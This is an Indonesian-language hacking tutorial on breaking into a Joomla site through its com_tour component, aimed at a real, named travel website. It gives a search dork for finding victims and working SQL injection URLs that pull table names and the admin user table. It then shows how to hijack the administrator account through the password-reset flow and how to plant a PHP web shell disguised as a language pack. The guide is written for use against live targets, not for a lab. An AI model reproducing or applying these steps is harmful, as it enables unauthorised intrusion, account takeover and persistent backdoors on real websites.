Inject Site Joomla + Upload Shell

Assalamualaikum Wr.Wb
Nah pada kesempatan kali ini,saya akan share gimana cara inject web joomla dan cara mengupload shell ato backdoor(pintu belakang).untuk kali ini kita akan menginject joomla pada komponen com_tour. kita bisa mencari exploitnya di beberapa tempat,seperti milw0rm,db-exploits,inject0r,dll.
coba buka salahsatu web tsb,disini saya coba membuka web innject0r pilih pada page search. Kemudian kita ketik com_tour



Dari web itu kita mendapatkan exploit : -999+UNION+ALL+SELECT+1,2,3,4

Ok sekarang kita ke topic.
1. cari target dengan dork “inurl:index.php?option=com_tour” 

2. tetapkan target, saya mencoba mengambil target  : http://[Andrian21]himalayareisen.ch/

Explloit  : 

/index.php?option=com_tour&view=trip&id=7&Itemid=91<=de
3. masukkan exploit di url web target hasilnya kurang lebih seperti ini :

http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4--&Itemid=91<=de 



Lah koq keluar error??nah di sini kita harus pinter2 membaca error yg muncul.untuk error itu ternyata nomer column yg kita masukkan salah.so kita cek ulang nomor kolomnya,deengan command “order by”.setelaha di cek ternyata pada column 36 terjadi error

4. kemudian kita cek di kolom berapa yg ada isinya dengan exploit yg tadi,bedanya untuk angkanya yang ini sampe 35. maka hasilnya :

http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--&Itemid=91<=de
 keluar table no 29,berarti ada sesuatu di 29,kita cek aja yuk

5. kita lihat nama2 tablenya,seperti step injection di kolom 29. Dengan menggunakan “group_concat(table_name)”.nah hasilnya kurang lebih seperti ini :

http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_concat(table_name),30,31,32,33,34,35 from information_schema.tables where table_schema=database()--&Itemid=91<=de

jika di situ ada sebagian yang ketutup,kalian bisa liat dengan cara klik 2x pada isi table yg muncul kemudian copas di notepad,atau bisa juga denga view page sourcenya

6. cari nama yg menurut kalian isinya penting,disini saya memilih nama jos_ user,kemudian kita convert jos_users ke hexa dengan tools kesayangan kalian masing-masing.

7. hasil convert dari jos_users adalah 6A6F735F7573657273. nah sekarang kita masukkan ke url dengan command “group_concat(column_name),maka hasilnya :

http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_concat(column_name),30,31,32,33,34,35 from information_schema.columns where table_name=0x6A6F735F7573657273--&Itemid=91<=de

8. maka akan keluar isi dari kolom jos_users,yaitu : id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activations,params. Maka kita pilih seperlunya az untuk isinya yang akan kita lihat.karena sekarang untuk crack pass menggunakan reset pass,maka yang akan kita butuhkan email,activations yang lain bias mendukung untuk cari tahu info yang lain seperti username,password,dll



9. untuk peresetan pass kita perlu exploit yaitu “index.php?option=com_user&view=reset”. Maka hasilnya : 

http://himalayareisen.ch/ index.php?option=com_user&view=reset




10. kita masukkan alamat email sang admin,nah setelah itu akan mucul page lagi yang akan meminta code activations,jadi kita masukkan az code activationnya jangan ragu-ragu.



11. ini waktunya yang kita tunggu-tunggu,yaitu merubah pass admin dan masuk sebagai admin.setelah code activation di submit or di send maka akan muncul form permintaan ganti pass dengan yang baru,jadi gantilah passnya terserah kalian



12. kalo dah terkirim ato di submit,kita langsung az menuju page adminnya yang berada di http://himalayareisen.ch/administrator isi user name dengan info yang tadi (yg ada di column jos_users) untuk passnya,isi dengan apa yang kalian ketik di form permintaan pass.

13. sekarang waktunya upload shell.langsung az kalian masuk ke extensions – install/uninstall,kita akan memakai cara dengan menginstal language pack.jadi kalo kalian belum ada silahkan download and search in google.

14. sebelum kalian upload tuch language pack,kalian harus edit dulu beberapa file yg ada di pack tsb,diantaranya install.xml dan index.html 15. untuk install.xml yg kita edita adalah “index.html” index.html kita ubah menjadi index.php jadi hasilnya : index.php.kemudian save

16. terus edit index.html nya,untuk index.html kalian hapus isinya,kalian ganti dengan script shell kalian. Terus ekstensinya kita ubah menjadi php jadi hasilnya index.php bukan index.html lagi

17. setelah semuanya beres,kita pack lagi menjadi zip.kemudian kita upload and install di extensions – install/uninstall (form install)




18. setelah sukses install language.sekarang bingung letak filenya,and nama direktorynya apa?ok,jadi untuk kita mengetahui di mana shell kita berada silahkan kalian upload lagi language tadi,nanti akan muncul keluar pesan error,di pesan error itulah nanti ada alamt tempat shell kita bearada



Nah pada gambar tsb ada tulisan yg ditandai,itu adalah alamat shell nya,jadi shellnya ada pada languages/en-US/index.php jadi hasilnya : 

http://himalayareisen.ch/ languages/en-US/index.php

Mudah kan,g seruwet yang kalian bayangkan.bila kalian males membacanya nich ada video tutornya silahkan diambil disini,untuk language pack yg udah saya edit silahkan di unduh di sini Jadi selamat mencoba az dah dan semoga tutor ini bermanfaat dan berguna bagi yang membaca,karena tulisan ini banyak sekali kesalahan,kekurangan,dan kehilafan hendaknya kalian sudi untuk mengoreksi,memberi saran,memberi kritikan tulisan ini,karena itu akan membantu kami untuk lebih berbenah diri. Sekian dulu terima kasih.

Wassalammualaikum Wr. Wb
Ranking: 5
 
© Andrian21 All Rights Reserved